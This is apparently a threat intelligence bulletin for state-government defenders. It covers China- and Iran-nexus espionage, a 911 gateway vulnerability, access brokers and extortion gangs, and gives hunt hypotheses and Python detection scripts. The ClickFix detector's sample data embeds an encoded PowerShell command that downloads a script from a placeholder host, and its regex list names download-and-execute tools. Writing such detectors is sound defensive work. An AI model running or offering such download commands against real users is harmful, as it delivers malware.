<p><strong>Threat Assessment Level: ELEVATED</strong> <em>Unchanged from the prior assessment period. The convergence of nation-state espionage tooling linked to China-nexus operations, actively exploited critical vulnerabilities in government-used platforms, and access brokers explicitly selling state and local government network access sustains this elevated posture.</em></p>
<h2><strong>Executive Summary</strong></h2>
<p>State government networks are under coordinated pressure from multiple directions this week. On April 23, CISA took the unusual step of publishing a malware analysis report for a newly identified backdoor called <strong>FIRESTARTER</strong> on the same day it released a joint Five Eyes advisory on China-nexus compromise of network devices — a pattern that historically signals a coordinated government response to an active espionage campaign. Separately, a vulnerability in <strong>Intrado 911 Emergency Gateway</strong> systems — the infrastructure that routes 911 calls — now has a CISA advisory warning that attackers can read, modify, or delete files on these life-safety systems. And an access broker known as <strong>HOOK SPIDER</strong>, whose client list reads like a who’s-who of ransomware operators, updated its profile this week with explicit targeting of government and local government entities across 66 countries, including the United States.</p>
<p>This is not theoretical. These are concurrent, active threats to the systems state agencies depend on every day.</p>
<h2><strong>What Changed</strong></h2>
<table> <thead> <tr> <th> <p>Date</p> </th> <th> <p>Development</p> </th> <th> <p>Why It Matters for State Government</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>7 Apr 2026</strong></p> </td> <td> <p>Researcher “Chaotic Eclipse” releases PoC for <strong>CVE-2026-33825</strong> (BlueHammer) — Microsoft Defender privilege escalation</p> </td> <td> <p>Lowers the barrier for exploitation of a tool deployed on virtually every state Windows endpoint</p> </td> </tr> <tr> <td> <p><strong>16 Apr 2026</strong></p> </td> <td> <p>Huntress Labs confirms BlueHammer exploited in the wild</p> </td> <td> <p>Moves from theoretical to confirmed threat; <strong>CISA KEV mandatory remediation deadline: 7 May 2026</strong></p> </td> </tr> <tr> <td> <p><strong>20 Apr 2026</strong></p> </td> <td> <p>ClickFix → <strong>NETSUPPORT</strong> RAT campaign updated, explicitly targeting government</p> </td> <td> <p>Social engineering technique tricks users into pasting malicious PowerShell — bypasses email security</p> </td> </tr> <tr> <td> <p><strong>22–23 Apr 2026</strong></p> </td> <td> <p>CISA adds two new KEV entries in 48 hours</p> </td> <td> <p>Signals elevated exploitation activity across the vulnerability landscape</p> </td> </tr> <tr> <td> <p><strong>23 Apr 2026</strong></p> </td> <td> <p>CISA publishes <strong>FIRESTARTER</strong> backdoor MAR (AR26-113A) alongside China-nexus advisory (AA26-113A)</p> </td> <td> <p>Sequential report numbering and same-day publication suggest linked investigation into government-targeting espionage</p> </td> </tr> <tr> <td> <p><strong>23 Apr 2026</strong></p> </td> <td> <p>ESET discloses <strong>GopherWhisper</strong> — China-aligned APT using M365 Graph API draft-email dead-drops for C2</p> </td> <td> <p>Abuses the same Microsoft 365 environment state agencies rely on for daily operations</p> </td> </tr> <tr> <td> <p><strong>23 Apr 2026</strong></p> </td> <td> <p>CISA/Five Eyes joint advisory <strong>AA26-113a</strong> on China-nexus 
compromised SOHO routers and edge devices</p> </td> <td> <p>State agency branch offices and remote sites often use exactly these device types</p> </td> </tr> <tr> <td> <p><strong>23 Apr 2026</strong></p> </td> <td> <p>Iranian espionage campaign updated — custom backdoors + legitimate RATs targeting government across 17 countries</p> </td> <td> <p>Expands the nation-state threat beyond China-nexus to include Iran-nexus actors</p> </td> </tr> <tr> <td> <p><strong>23 Apr 2026</strong></p> </td> <td> <p>CISA ICS advisory for <strong>Intrado 911 Emergency Gateway</strong> file manipulation vulnerability</p> </td> <td> <p>Direct threat to state-operated or state-overseen 911 dispatch infrastructure</p> </td> </tr> <tr> <td> <p><strong>23 Apr 2026</strong></p> </td> <td> <p><strong>CoinbaseCartel</strong> posts new government victim — exfiltration-only, no encryption</p> </td> <td> <p>Data theft without ransomware means no obvious alert fires; stolen PII has high criminal market value</p> </td> </tr> <tr> <td> <p><strong>24 Apr 2026</strong></p> </td> <td> <p><strong>HOOK SPIDER</strong> access broker profile updated — sells gov/local-gov network access to ransomware affiliates</p> </td> <td> <p>A HOOK SPIDER sale today becomes a ransomware incident in 2–14 days</p> </td> </tr> </tbody>
</table>
<h2><strong>Threat Timeline</strong></h2>
<table> <thead> <tr> <th> <p>Timeframe</p> </th> <th> <p>Event</p> </th> <th> <p>Threat Category</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>7 Apr</strong></p> </td> <td> <p>BlueHammer PoC released (CVE-2026-33825)</p> </td> <td> <p>Vulnerability / Privilege Escalation</p> </td> </tr> <tr> <td> <p><strong>16 Apr</strong></p> </td> <td> <p>BlueHammer confirmed exploited in the wild</p> </td> <td> <p>Active Exploitation</p> </td> </tr> <tr> <td> <p><strong>20 Apr</strong></p> </td> <td> <p>ClickFix → NETSUPPORT campaign targets government</p> </td> <td> <p>Social Engineering / RAT Delivery</p> </td> </tr> <tr> <td> <p><strong>22 Apr</strong></p> </td> <td> <p>CISA KEV addition #1</p> </td> <td> <p>Active Exploitation</p> </td> </tr> <tr> <td> <p><strong>23 Apr</strong></p> </td> <td> <p>CISA KEV addition #2</p> </td> <td> <p>Active Exploitation</p> </td> </tr> <tr> <td> <p><strong>23 Apr</strong></p> </td> <td> <p>FIRESTARTER MAR (AR26-113A) published</p> </td> <td> <p>Nation-State Espionage (China-nexus)</p> </td> </tr> <tr> <td> <p><strong>23 Apr</strong></p> </td> <td> <p>AA26-113a: China-nexus compromised device networks</p> </td> <td> <p>Nation-State Infrastructure Compromise</p> </td> </tr> <tr> <td> <p><strong>23 Apr</strong></p> </td> <td> <p>GopherWhisper M365 C2 disclosed</p> </td> <td> <p>Nation-State Espionage (China-nexus)</p> </td> </tr> <tr> <td> <p><strong>23 Apr</strong></p> </td> <td> <p>Iranian espionage campaign updated — 17 countries</p> </td> <td> <p>Nation-State Espionage (Iran-nexus)</p> </td> </tr> <tr> <td> <p><strong>23 Apr</strong></p> </td> <td> <p>Intrado 911 EGW advisory (ICSA-26-113-06)</p> </td> <td> <p>Critical Infrastructure Vulnerability</p> </td> </tr> <tr> <td> <p><strong>23 Apr</strong></p> </td> <td> <p>CoinbaseCartel posts new government victim</p> </td> <td> <p>Data Extortion</p> </td> </tr> <tr> <td> <p><strong>24 Apr</strong></p> </td> <td> <p>HOOK SPIDER profile updated — gov targeting confirmed</p> </td> <td> 
<p>Access Brokering / Ransomware Enablement</p> </td> </tr> <tr> <td> <p><strong>7 May</strong></p> </td> <td> <p><strong>CISA KEV deadline: BlueHammer (CVE-2026-33825)</strong></p> </td> <td> <p>Compliance Deadline</p> </td> </tr> </tbody>
</table>
<h2><strong>Key Threat Analysis</strong></h2>
<h3><strong>1. FIRESTARTER and the China-Nexus Espionage Convergence</strong></h3>
<p>CISA’s simultaneous publication of the <strong>FIRESTARTER</strong> backdoor malware analysis report (AR26-113A) and the China-nexus compromised device advisory (AA26-113A) is the most significant signal this week. The sequential report numbering — AR26-113<strong>A</strong> and AA26-113<strong>A</strong> — strongly suggests these are products of the same investigation.</p>
<p>If FIRESTARTER is the backdoor deployed through the compromised SOHO router and edge device infrastructure described in AA26-113A, the implications for state government are severe. State agencies operate hundreds of branch offices, field locations, and remote sites that commonly use exactly the types of small office routers and network appliances called out in the advisory. These devices are often managed by local staff or MSPs with limited security visibility.</p>
<p>This sits alongside two other active China-nexus operations:</p>
<ul> <li><strong>GopherWhisper</strong> — A newly disclosed APT that abuses Microsoft 365 Graph API draft-email folders as dead-drop C2 channels, with Slack and Discord as backup communication paths. For any state agency running M365 (which is nearly all of them), this means the adversary’s command-and-control traffic looks like normal productivity suite API calls.</li> <li><strong>Volt Typhoon</strong> — The ongoing campaign targeting critical infrastructure through compromised network devices, tracked continuously since prior reporting periods.</li>
</ul>
<p><strong>Bottom line:</strong> China-nexus actors are running multiple parallel operations that target the exact technology stack most state governments depend on — M365 for productivity, SOHO routers at branch offices, and edge network devices at agency perimeters.</p>
<h3><strong>2. Intrado 911 Emergency Gateway — A Life-Safety Vulnerability</strong></h3>
<p>CISA advisory <strong>ICSA-26-113-06</strong> discloses a vulnerability in the <strong>Intrado 911 Emergency Gateway (EGW)</strong> — the system Public Safety Answering Points (PSAPs) use to route 911 calls. Successful exploitation allows an attacker to <strong>read, modify, or delete files</strong> on the system.</p>
<p>This is not a typical IT vulnerability. This is a life-safety system. File manipulation on a 911 gateway could disrupt call routing during an emergency, redirect calls, or corrupt dispatch data. States operate or oversee 911 infrastructure, and this system may not appear in standard IT asset inventories because it is managed by public safety agencies or third-party 911 service providers.</p>
<p>This is the first CISA advisory specifically targeting 911 dispatch infrastructure in the current tracking period, making it a novel and high-priority finding.</p>
<h3><strong>3. HOOK SPIDER: The Access Broker Selling Your Network to Ransomware Gangs</strong></h3>
<p><strong>HOOK SPIDER</strong> (also known as Pirat-Networks, BenjaminFranklin, Big-Bro, and crasty_bro) is an access broker — a criminal actor who compromises networks and then sells that access to ransomware operators. Their profile was updated on April 24 with confirmed targeting of <strong>government and local government</strong> across 66 countries including the United States.</p>
<p>What makes HOOK SPIDER a force multiplier is their client list. They sell access to:</p>
<ul> <li><strong>SCATTERED SPIDER</strong> — Known for sophisticated social engineering and SIM-swapping</li> <li><strong>VICE SPIDER</strong> — Ransomware affiliate</li> <li><strong>ALPHA SPIDER</strong> (BlackCat/ALPHV successor operations)</li> <li><strong>WANDERING SPIDER</strong></li> <li><strong>Nova RaaS</strong> operators</li>
</ul>
<p>HOOK SPIDER uses commodity info-stealers (<strong>RedLine</strong>, <strong>Vidar</strong>) and the <strong>ProxyShell</strong> exploit chain to gain initial access. A single successful HOOK SPIDER compromise of a state agency network could be handed off to any of these ransomware operators within days.</p>
<p>The active ransomware landscape reinforces this concern:</p>
<ul> <li><strong>DragonForce</strong> — 492 confirmed victims, updated April 22</li> <li><strong>CoinbaseCartel</strong> — 164 victims, new victim posted April 23, including a government ministry</li> <li><strong>Everest, Qilin, Lynx, Termite, Nightspire, SafePay, IncRansom</strong> — All active and tracked</li>
</ul>
<h3><strong>4. CoinbaseCartel: Data Theft Without the Ransomware Alert</strong></h3>
<p><strong>CoinbaseCartel</strong> represents an evolution in the extortion model that is particularly dangerous for government. They explicitly state they “never involve system encryption or operational disruption.” Instead, they steal data and extort victims with the threat of publication.</p>
<p>Their TTPs include:</p>
<ul> <li>Abuse of <strong>valid cloud accounts</strong> (T1078.004)</li> <li><strong>Vishing</strong> (voice phishing) for initial access (T1566.004)</li> <li>Exfiltration to cloud storage services</li>
</ul>
<p>For state agencies holding driver’s license records, tax data, Medicaid information, and voter rolls, this model is insidious: <strong>there is no ransomware detonation to trigger an alert.</strong> Detection depends entirely on data loss prevention (DLP) controls and user/entity behavior analytics (UEBA) — capabilities that many state agencies have not fully deployed.</p>
<h3><strong>5. Iranian Espionage Campaign Expands</strong></h3>
<p>An active Iranian-nexus espionage campaign was updated on April 23, targeting <strong>government, education, energy, telecommunications, utilities, and non-profit</strong> sectors across 17 countries. The actors deploy custom backdoors alongside legitimate remote access tools — a hallmark of <strong>MuddyWater</strong> (also known as Seedworm, assessed as Iranian MOIS-affiliated) and <strong>APT34</strong> tradecraft.</p>
<p>While no U.S. state government victims have been confirmed in this campaign, the targeting profile aligns closely with state agency verticals (government, education, energy, utilities). <strong>MuddyWater</strong> is assessed with moderate probability to target U.S. state networks within the next 14 days.</p>
<h3><strong>6. ClickFix Social Engineering Targets Government Users</strong></h3>
<p>A financially motivated campaign is using the <strong>ClickFix</strong> technique to deploy <strong>NETSUPPORT</strong> RAT against government targets. ClickFix tricks users into copying and pasting malicious PowerShell commands — often disguised as browser error “fixes.” Because the user manually executes the command, this technique <strong>bypasses email security gateways and many endpoint protections</strong> that focus on file-based delivery.</p>
<h3><strong>7. Critical Vulnerabilities Requiring Immediate Attention</strong></h3>
<table> <thead> <tr> <th> <p>CVE</p> </th> <th> <p>Product</p> </th> <th> <p>CVSS</p> </th> <th> <p>Status</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>CVE-2026-33825</strong> (BlueHammer)</p> </td> <td> <p>Microsoft Defender</p> </td> <td> <p>—</p> </td> <td> <p>Exploited in the wild; <strong>KEV deadline 7 May 2026</strong></p> </td> </tr> <tr> <td> <p><strong>CVE-2026-1340</strong></p> </td> <td> <p>Ivanti Endpoint Manager Mobile (EPMM)</p> </td> <td> <p>9.8</p> </td> <td> <p>Actively exploited per campaign data</p> </td> </tr> <tr> <td> <p><strong>CVE-2026-1281</strong></p> </td> <td> <p>Ivanti Endpoint Manager Mobile (EPMM)</p> </td> <td> <p>9.8</p> </td> <td> <p>Actively exploited per campaign data</p> </td> </tr> <tr> <td> <p><strong>CVE-2026-1731</strong></p> </td> <td> <p>BeyondTrust Remote Support / Privileged Remote Access</p> </td> <td> <p>9.8</p> </td> <td> <p>Active exploitation campaign confirmed; reconnaissance activity observed (GreyNoise)</p> </td> </tr> </tbody>
</table>
<p>All four vulnerabilities affect products commonly deployed in state government environments. The two Ivanti EPMM vulnerabilities are particularly concerning for agencies using Ivanti for mobile device management, and the BeyondTrust vulnerability directly impacts privileged access management — the keys to the kingdom.</p>
<h2><strong>Predictive Analysis</strong></h2>
<p>Based on current threat actor operational tempo, vulnerability exploitation patterns, and targeting data:</p>
<table> <thead> <tr> <th> <p>Scenario</p> </th> <th> <p>Probability</p> </th> <th> <p>Timeframe</p> </th> <th> <p>Basis</p> </th> </tr> </thead> <tbody> <tr> <td> <p>CISA publishes follow-up linking FIRESTARTER to a specific China-nexus actor group with additional IOCs</p> </td> <td> <p><strong>70%</strong></p> </td> <td> <p>7 days</p> </td> <td> <p>Same-day publication pattern with sequential numbering historically precedes attribution</p> </td> </tr> <tr> <td> <p>Additional CISA KEV entries added</p> </td> <td> <p><strong>60%</strong></p> </td> <td> <p>7 days</p> </td> <td> <p>Two additions in 48 hours indicates elevated exploitation discovery rate</p> </td> </tr> <tr> <td> <p>DragonForce or CoinbaseCartel posts a U.S. government entity as a victim</p> </td> <td> <p><strong>50%</strong></p> </td> <td> <p>7 days</p> </td> <td> <p>Combined 656 victims, both updated within 48 hours, both target government</p> </td> </tr> <tr> <td> <p>MuddyWater/Iranian-nexus actors target a U.S. state government network</p> </td> <td> <p><strong>40%</strong></p> </td> <td> <p>14 days</p> </td> <td> <p>Campaign updated with government targeting across 17 countries; U.S. state agencies match victim profile</p> </td> </tr> <tr> <td> <p>HOOK SPIDER access sale leads to ransomware incident at a state/local government entity</p> </td> <td> <p><strong>35%</strong></p> </td> <td> <p>14 days</p> </td> <td> <p>Confirmed gov/local-gov targeting + confirmed relationships with active ransomware operators</p> </td> </tr> <tr> <td> <p>APT29 reconnaissance against state election infrastructure ahead of 2026 midterms</p> </td> <td> <p><strong>30%</strong></p> </td> <td> <p>30 days</p> </td> <td> <p>Historical pattern of APT29 pivoting to state targets during election cycles; absence of current activity is not assurance</p> </td> </tr> </tbody>
</table>
<h2><strong>SOC Operational Guidance</strong></h2>
<h3><strong>Hunt Hypotheses</strong></h3>
<p><strong>Hunt 1: FIRESTARTER Backdoor Activity</strong></p>
<ul> <li><strong>Hypothesis:</strong> China-nexus actors have deployed FIRESTARTER on state network endpoints via compromised edge devices.</li> <li><strong>What to look for:</strong> Unusual outbound connections from endpoints to infrastructure identified in CISA MAR AR26-113A (download full IOC set from CISA); unexpected scheduled tasks or services on systems adjacent to SOHO routers or VPN concentrators.</li> <li><strong>ATT&CK techniques:</strong> T1059 (Command and Scripting Interpreter), T1071 (Application Layer Protocol), T1105 (Ingress Tool Transfer), T1082 (System Information Discovery), T1041 (Exfiltration Over C2 Channel)</li> <li><strong>Data sources:</strong> EDR telemetry, firewall logs, DNS query logs, proxy logs</li>
</ul>
<p><strong>Hunt 2: GopherWhisper M365 Graph API Abuse</strong></p>
<ul> <li><strong>Hypothesis:</strong> An adversary is using M365 Graph API calls to draft-email folders as a covert C2 channel.</li> <li><strong>What to look for:</strong> Anomalous Graph API calls to /me/messages or /me/mailFolders/Drafts/messages endpoints from non-standard user agents or service principals; draft emails created and deleted in rapid succession; Slack/Discord webhook traffic from server endpoints.</li> <li><strong>ATT&CK techniques:</strong> T1071.003 (Mail Protocols), T1102 (Web Service), T1567 (Exfiltration Over Web Service)</li> <li><strong>Data sources:</strong> Microsoft 365 Unified Audit Log, Azure AD sign-in logs, Cloud App Security alerts</li>
</ul>
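<p>One way to run the "created and deleted in rapid succession" part of this hunt over Unified Audit Log exports, as an added example that is not part of the report or of any vendor product: it pairs each Drafts-folder Create with the delete of the same item and flags any user/client combination whose drafts live only seconds, repeatedly, inside a short window. The record shape, the ClientInfoString values and the thresholds are assumptions to tune against your own baseline; all records are constructed.</p>

```python
"""Hunt 2: Drafts-folder dead-drop pattern over Microsoft 365 Unified Audit Log records.

Assumptions (not from the report): records follow the Exchange mailbox-audit shape
seen in the UAL (CreationTime, Operation, UserId, ClientInfoString, and Item /
AffectedItems carrying ParentFolder.Path). Thresholds are illustrative starting points.
All records below are constructed sample data.
"""
from collections import defaultdict
from datetime import datetime, timedelta

CREATE_OPS = {"Create"}
DELETE_OPS = {"SoftDelete", "HardDelete", "MoveToDeletedItems"}


def touched_items(rec):
    """Yield (item_id, folder_path) for every mailbox item a record touches."""
    if "Item" in rec:
        yield rec["Item"]["Id"], rec["Item"].get("ParentFolder", {}).get("Path", "")
    for item in rec.get("AffectedItems", []):
        yield item["Id"], item.get("ParentFolder", {}).get("Path", "")


def find_draft_dead_drops(records, max_lifetime_s=120, min_pairs=3, window_s=600):
    """Return one finding per (user, client) that creates Drafts items and deletes
    them again within max_lifetime_s, at least min_pairs times in any window_s span.
    A human drafting mail rarely does this; a beacon polling a dead drop does it
    on a schedule."""
    created = {}               # (user, client, item_id) -> creation time
    pairs = defaultdict(list)  # (user, client) -> [(created_at, deleted_at)]
    for rec in sorted(records, key=lambda r: r["CreationTime"]):
        ts = datetime.fromisoformat(rec["CreationTime"])
        actor = (rec["UserId"].lower(), rec.get("ClientInfoString", ""))
        for item_id, folder in touched_items(rec):
            if not folder.lower().endswith("drafts"):
                continue
            key = actor + (item_id,)
            if rec["Operation"] in CREATE_OPS:
                created[key] = ts
            elif rec["Operation"] in DELETE_OPS and key in created:
                born = created.pop(key)
                if ts - born <= timedelta(seconds=max_lifetime_s):
                    pairs[actor].append((born, ts))
    findings = []
    for (user, client), events in pairs.items():
        events.sort()
        lo, best = 0, 0
        for hi in range(len(events)):  # sliding window over creation times
            while events[hi][0] - events[lo][0] > timedelta(seconds=window_s):
                lo += 1
            best = max(best, hi - lo + 1)
        if best >= min_pairs:
            findings.append({
                "user": user,
                "client": client,
                "pairs_in_window": best,
                "avg_lifetime_s": sum((d - c).total_seconds() for c, d in events) / len(events),
            })
    return findings


def audit_record(ts, user, client, op, item_id, subject, folder="\\Drafts"):
    """Build a constructed UAL-style record: Create carries Item, deletes carry AffectedItems."""
    item = {"Id": item_id, "Subject": subject, "ParentFolder": {"Path": folder}}
    rec = {"CreationTime": ts.isoformat(), "Operation": op, "UserId": user, "ClientInfoString": client}
    if op in CREATE_OPS:
        rec["Item"] = item
    else:
        rec["AffectedItems"] = [item]
    return rec


def constructed_records():
    """Constructed sample: one mailbox driven by a REST client on a 60 s cadence,
    one human in OWA with ordinary draft behaviour."""
    base = datetime(2026, 4, 23, 8, 0, 0)
    recs = []
    beacon = ("jdoe@agency.example", "Client=REST;Client=RESTSystem;;")
    for i in range(4):  # draft appears, is collected, and is removed ~20 s later
        t0 = base + timedelta(seconds=60 * i)
        recs.append(audit_record(t0, *beacon, "Create", f"AAMk-{i}", "task"))
        recs.append(audit_record(t0 + timedelta(seconds=20), *beacon, "HardDelete", f"AAMk-{i}", "task"))
    human = ("asmith@agency.example", "Client=OWA;Action=ViaProxy")
    recs.append(audit_record(base, *human, "Create", "AAMk-h1", "Budget memo"))
    recs.append(audit_record(base + timedelta(hours=2), *human, "SoftDelete", "AAMk-h1", "Budget memo"))
    recs.append(audit_record(base + timedelta(minutes=5), *human, "Create", "AAMk-h2", "oops"))
    recs.append(audit_record(base + timedelta(minutes=5, seconds=30), *human, "SoftDelete", "AAMk-h2", "oops"))
    return recs


if __name__ == "__main__":
    for f in find_draft_dead_drops(constructed_records()):
        print(f"{f['user']} via {f['client']}: {f['pairs_in_window']} create/delete pairs, "
              f"avg draft lifetime {f['avg_lifetime_s']:.0f}s")
```

<p>The single quick delete by the OWA user stays below the threshold, while the REST client's four scheduled create/delete pairs are reported; pivot from the finding to the Azure AD sign-in and OAuth consent logs for that identity.</p>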
<p><strong>Hunt 3: ClickFix PowerShell Execution</strong></p>
<ul> <li><strong>Hypothesis:</strong> Users are being socially engineered into pasting malicious PowerShell commands from browser prompts.</li> <li><strong>What to look for:</strong> powershell.exe with -encodedcommand or -e flags spawned within seconds of browser process focus change; PowerShell downloading and executing NETSUPPORT RAT components; new entries in HKCU\Software\Microsoft\Windows\CurrentVersion\Run pointing to NETSUPPORT binaries.</li> <li><strong>ATT&CK techniques:</strong> T1204.002 (User Execution: Malicious File), T1059.001 (PowerShell), T1219 (Remote Access Software), T1547.001 (Registry Run Keys)</li> <li><strong>Data sources:</strong> EDR process creation logs, PowerShell script block logging (Event ID 4104), registry monitoring</li>
</ul>
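<p>An added example, not from the report, of the first "what to look for" item run over constructed EDR telemetry: it recognises every abbreviation of -EncodedCommand that powershell.exe accepts (a rule matching only the long form misses -e and -enc), decodes the payload for the analyst, and correlates the launch with a browser parent or with a browser losing focus within 5 seconds on the same host. The event field names, the browser list and the focus-loss event are assumptions about what your EDR exposes.</p>

```python
"""Hunt 3: ClickFix-style encoded PowerShell launched right after a browser prompt.

Assumptions (not from the report): EDR telemetry normalised to the event dicts
below (process-creation plus browser focus-loss events), a 5-second correlation
window, and the browser list. All events are constructed sample data.
"""
import base64
import re
from datetime import datetime, timedelta

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus the -ec
# alias, so match all of them rather than only the long form.
ENCODED_FLAGS = ["ec"] + ["encodedcommand"[:i] for i in range(1, 15)]
ENC_FLAG_RE = re.compile(
    r"(?:^|\s)[-/](?:" + "|".join(sorted(ENCODED_FLAGS, key=len, reverse=True)) + r")\s+([A-Za-z0-9+/=]+)",
    re.I,
)
DOWNLOAD_RE = re.compile(
    r"\b(?:invoke-webrequest|iwr|invoke-expression|iex|downloadstring|downloadfile|"
    r"net\.webclient|start-bitstransfer|curl|wget)\b", re.I)


def encode_command(script):
    """Base64(UTF-16LE) form that powershell.exe expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
        return "<undecodable>"


def hunt_clickfix(events, window_s=5):
    """Flag encoded PowerShell spawned directly by a browser, or by any parent
    (typically explorer.exe via the Run dialog) within window_s of a browser losing
    focus on the same host. Severity rises when the decoded script fetches content."""
    last_focus = {}  # host -> (time, browser image)
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        t = datetime.fromisoformat(ev["ts"])
        image = ev["image"].lower()
        if ev["type"] == "focus_lost":
            if image in BROWSERS:
                last_focus[ev["host"]] = (t, image)
            continue
        if ev["type"] != "process" or image not in POWERSHELL:
            continue
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is None:
            continue  # plain-text command lines are covered by other rules
        parent = ev["parent"].lower()
        reasons = []
        if parent in BROWSERS:
            reasons.append(f"spawned directly by {parent}")
        focus = last_focus.get(ev["host"])
        if focus and timedelta(0) <= t - focus[0] <= timedelta(seconds=window_s):
            reasons.append(f"{int((t - focus[0]).total_seconds())}s after {focus[1]} lost focus")
        if not reasons:
            continue
        severity = "high" if DOWNLOAD_RE.search(decoded) else "medium"
        findings.append({"host": ev["host"], "user": ev["user"], "parent": parent,
                         "severity": severity, "reasons": reasons, "decoded": decoded})
    return findings


def sample_events():
    """Constructed telemetry: one ClickFix paste, one SCCM job, one browser-spawned
    shell, and one plain script launch that the rule should ignore."""
    return [
        {"type": "focus_lost", "ts": "2026-04-24T09:14:02", "host": "WS-1042",
         "image": "chrome.exe", "user": "state\\jdoe"},
        {"type": "process", "ts": "2026-04-24T09:14:05", "host": "WS-1042",
         "image": "powershell.exe", "parent": "explorer.exe", "user": "state\\jdoe",
         "cmdline": "powershell.exe -w hidden -nop -enc " + encode_command(
             "Invoke-WebRequest -Uri 'http://example.invalid/fix.ps1' -OutFile $env:TEMP\\fix.ps1")},
        {"type": "process", "ts": "2026-04-24T09:30:00", "host": "WS-1042",
         "image": "powershell.exe", "parent": "ccmexec.exe", "user": "nt authority\\system",
         "cmdline": "powershell.exe -EncodedCommand " + encode_command("Get-Date")},
        {"type": "process", "ts": "2026-04-24T09:31:00", "host": "WS-2210",
         "image": "powershell.exe", "parent": "msedge.exe", "user": "state\\asmith",
         "cmdline": "powershell.exe -e " + encode_command("Get-Process")},
        {"type": "process", "ts": "2026-04-24T10:00:00", "host": "WS-1042",
         "image": "powershell.exe", "parent": "explorer.exe", "user": "state\\jdoe",
         "cmdline": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"},
    ]


if __name__ == "__main__":
    for f in hunt_clickfix(sample_events()):
        print(f"[{f['severity'].upper()}] {f['host']} {f['user']} parent={f['parent']}: "
              f"{'; '.join(f['reasons'])}\n    decoded: {f['decoded']}")
```

<p>The SCCM-launched encoded command is not flagged because nothing ties it to a browser, which is the point of the correlation: the encoded flag alone is too noisy in managed environments, and the decoded script is what lets the analyst triage quickly.</p>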
<p><strong>Hunt 4: CoinbaseCartel Cloud Exfiltration</strong></p>
<ul> <li><strong>Hypothesis:</strong> An adversary has compromised cloud accounts and is exfiltrating sensitive data to external cloud storage without deploying ransomware.</li> <li><strong>What to look for:</strong> Unusual volume of file downloads from SharePoint/OneDrive by a single account; OAuth token grants to unfamiliar applications; large data transfers to consumer cloud storage (Google Drive, Mega, Dropbox) from state network egress points; vishing attempts reported to helpdesk preceding account compromise.</li> <li><strong>ATT&CK techniques:</strong> T1078.004 (Valid Accounts: Cloud Accounts), T1566.004 (Phishing: Voice), T1567 (Exfiltration Over Web Service)</li> <li><strong>Data sources:</strong> CASB logs, DLP alerts, Azure AD sign-in anomalies, helpdesk ticket correlation</li>
</ul>
<p><strong>Hunt 5: HOOK SPIDER Initial Access Indicators</strong></p>
<ul> <li><strong>Hypothesis:</strong> HOOK SPIDER has compromised or is attempting to compromise state agency infrastructure using info-stealers and ProxyShell.</li> <li><strong>What to look for:</strong> RedLine or Vidar stealer artifacts on endpoints (check for known file paths and registry keys); ProxyShell exploitation attempts against Exchange servers (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207); credentials for state agency systems appearing on dark web marketplaces or paste sites.</li> <li><strong>ATT&CK techniques:</strong> T1589.001 (Gather Victim Identity: Credentials), T1078 (Valid Accounts), T1190 (Exploit Public-Facing Application), T1555 (Credentials from Password Stores)</li> <li><strong>Data sources:</strong> EDR alerts, Exchange server logs, dark web monitoring feeds, credential leak monitoring</li>
</ul>
<h3><strong>Detection Rules to Prioritize</strong></h3>
<table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Detection</p> </th> <th> <p>ATT&CK ID</p> </th> <th> <p>Platform</p> </th> </tr> </thead> <tbody> <tr> <td> <p>HIGH</p> </td> <td> <p>PowerShell encoded command execution from browser child process</p> </td> <td> <p>T1059.001</p> </td> <td> <p>EDR / Sysmon</p> </td> </tr> <tr> <td> <p>HIGH</p> </td> <td> <p>M365 Graph API draft-email rapid create/delete pattern</p> </td> <td> <p>T1071.003</p> </td> <td> <p>M365 UAL / CASB</p> </td> </tr> <tr> <td> <p>HIGH</p> </td> <td> <p>BeyondTrust RS/PRA exploitation attempts (CVE-2026-1731)</p> </td> <td> <p>T1190</p> </td> <td> <p>WAF / IDS</p> </td> </tr> <tr> <td> <p>HIGH</p> </td> <td> <p>Ivanti EPMM unauthenticated API access (CVE-2026-1340, CVE-2026-1281)</p> </td> <td> <p>T1190</p> </td> <td> <p>MDM logs / WAF</p> </td> </tr> <tr> <td> <p>MEDIUM</p> </td> <td> <p>OAuth device-code flow from unexpected geolocation</p> </td> <td> <p>T1078</p> </td> <td> <p>Azure AD Conditional Access</p> </td> </tr> <tr> <td> <p>MEDIUM</p> </td> <td> <p>Large-volume SharePoint/OneDrive download by single identity</p> </td> <td> <p>T1567</p> </td> <td> <p>CASB / DLP</p> </td> </tr> <tr> <td> <p>MEDIUM</p> </td> <td> <p>New scheduled task or service creation on systems near network edge</p> </td> <td> <p>T1053 / T1543</p> </td> <td> <p>EDR / Sysmon</p> </td> </tr> </tbody>
</table>
<h2><strong>Sector-Specific Defensive Priorities</strong></h2>
<h3><strong>Financial Services (State Treasury, Revenue, Tax Agencies)</strong></h3>
<ul> <li><strong>Primary threat:</strong> CoinbaseCartel’s exfiltration-only model targeting financial data via cloud account compromise and vishing. Tax records and revenue data are high-value targets.</li> <li><strong>Action:</strong> Enforce conditional access policies requiring compliant devices for all cloud access to financial systems. Deploy DLP rules specifically monitoring for bulk export of taxpayer PII. Brief helpdesk staff on vishing scenarios where callers impersonate IT support to obtain MFA codes.</li> <li><strong>Key CVE:</strong> CVE-2026-1731 (BeyondTrust) — revenue agencies using BeyondTrust for vendor remote support must patch immediately.</li>
</ul>
<h3><strong>Energy (State Energy Offices, Utility Oversight, Dam Safety)</strong></h3>
